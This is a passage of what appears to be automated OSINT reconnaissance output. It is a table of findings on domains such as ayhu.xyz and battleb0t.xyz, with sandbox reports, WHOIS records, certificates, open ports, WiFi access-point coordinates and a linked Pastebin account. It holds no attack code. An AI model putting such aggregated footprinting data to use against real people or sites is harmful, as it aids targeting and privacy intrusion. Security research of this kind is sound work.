"urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://www.youtube.com/github" data-ga-click="Blog\n go to YouTube\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<span class="sr-only">GitHub on YouTube</span>" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://www.linkedin.com/company/github" data-ga-click="Blog\n go to Linkedin\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006628]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6628_34219005\\Ruleset Data]- [targetUID: 00000000-00006628]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\6628_723415155\\Filtering Rules]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006628]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00006628]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6628_723415155\\Filtering Rules-AA]- [targetUID: 00000000-00006628]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006628]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\6628_1327490462\\edge_autofill_field_data.json]- [targetUID: 00000000-00006628]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006628]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006628]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006628]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006628]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006628]\n "Tabs_13328299007683854" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13328299007683854]- [targetUID: 00000000-00006628]\n "ed4039f5-9b32-4b23-ad0a-52650dbff6f6.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\ed4039f5-9b32-4b23-ad0a-52650dbff6f6.tmp]- [targetUID: 00000000-00006628]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Diagnostic Data-wal]- [targetUID: 00000000-00006628]\n "urlref_httpsgithub.cohiddenchars" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "f_0004c5" has type "gzip compressed data from Unix original size modulo 2^32 781225"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c5]- [targetUID: 00000000-00003808]\n "b978b9a8-ced7-4dda-94a5-5dbd2c301fa0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b978b9a8-ced7-4dda-94a5-5dbd2c301fa0.tmp]- [targetUID: 00000000-00006628]\n "da1e6743-5e1c-49e6-a14b-642c85423466.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\da1e6743-5e1c-49e6-a14b-642c85423466.tmp]- [targetUID: 00000000-00006628]\n "7ac7762a-375d-4477-b7a7-9b70dd9d8563.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7ac7762a-375d-4477-b7a7-9b70dd9d8563.tmp]- [targetUID: 00000000-00006628]\n "90ea1062-a906-4309-8722-cf3037f4df69.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\90ea1062-a906-4309-8722-cf3037f4df69.tmp]- [targetUID: 00000000-00006628]\n "71b10f44-5b6a-47b3-ae02-aac8dd4cc536.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\71b10f44-5b6a-47b3-ae02-aac8dd4cc536.tmp]- [targetUID: 00000000-00006628]\n "6dd70d2e-23b1-4d9b-bb59-c777ca623037.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6dd70d2e-23b1-4d9b-bb59-c777ca623037.tmp]- [targetUID: 00000000-00006628]\n "c514c718-3835-4f67-921e-d7e847351cd2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\c514c718-3835-4f67-921e-d7e847351cd2.tmp]- [targetUID: 00000000-00006628]\n "02e0acea-ebc0-4e88-8e8a-1e44ce38bd84.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 18692"- Location: [%TEMP%\\02e0acea-ebc0-4e88-8e8a-1e44ce38bd84.tmp]- [targetUID: 00000000-00006628]\n "Network Action Predictor" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Ne | 185.199.108.153 |
| 2023-05-12 02:54:00 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 104.21.6.166 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1a0dc2 (Net ID: 0C:EA:C9:15:D9:AF) | 37.751, -97.822 |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:80 | 188.114.96.0/24 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.76 | 34.74.170.74 |
| 2023-05-12 03:43:26 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | World4You Internet Services GmbH | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:F0:3A:5B) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:45:21 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8201::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:44:35 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | fluid.battleb0t.xyz |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
%ERROR:101: no entries found
%
% No entries found in source RIPE.
% This query was served by the RIPE Database Query Service version 1.106.1 (ABERDEEN)
| expressdryclean.gr |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/ayhu | ayhu |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Cloudflare | ayhu.xyz |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HSTS | pics.battleb0t.xyz |
| 2023-05-12 02:54:38 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CloudFlare CloudFlare Load Balancer | 172.67.168.252 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F2:1A:77) | 37.7642, -122.3993 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BossWirelessSitecom (Net ID: 00:0C:F6:9F:57:4C) | 50.8897, 6.0563 |
| 2023-05-12 02:56:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.calgarystampede.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "52.85.247.122:443"\n "13.249.139.109:80"\n "65.8.55.54:80"\n "52.85.247.36:443"\n "65.8.55.18:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "35AY2PEO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\35AY2PEO.txt]- [targetUID: 00000000-00003564]\n Dropped file: "I24JX9IM.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I24JX9IM.txt]- [targetUID: 00000000-00003564]\n Dropped file: "OC7G5YSO.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OC7G5YSO.txt]- [targetUID: 00000000-00002492]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "search-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "calgary-stampede-workmark-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-youtube_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "cs-logo-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "icon-twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "down-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpswww.calgarystampede.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003564]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002492]\n "_ssgManifest_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Agriculture_adventure_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 progressive precision 8 537x358 frames 3"- [targetUID: N/A]\n "index-c1b82293aeb4d48c_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Super_Wheel_113_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 240x240 segment length 16 progressive precision 8 420x280 frames 3"- [targetUID: N/A]\n "_0C20F077-3DD3-11ED-9C23-080027B2E225_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002492]\n "7ddd681543e5fa52_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"GET /images/icon-twitter.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "GET /images/icon-youtube.svg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive"\n "GET /_next/static/css/7ddd681543e5fa52.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.calgarystampede.com/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.calgarystampede.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAge: 12329\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Length: 379750\nContent-Type: text/html; charset=UTF-8\nDate: Mon, 26 Sep 2022 18:14:59 GMT\nEtag: "ef9f0aca69e5a7ab84d4408dbf4dc83f-ssl-df"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GDXVX21BQQBCED27H862YBAB\n\nJ\'O:u9kk1\\ Hb!F?J=q v |437w_z3bcO>=MM+SS|6Fn4Ko90SG#xxiO[{\'fboOc{?!wh6:~Yo~\n=k3-y<5@}~|4lFcC{<4k1$EsV|/Y5tQy%W$-e B! 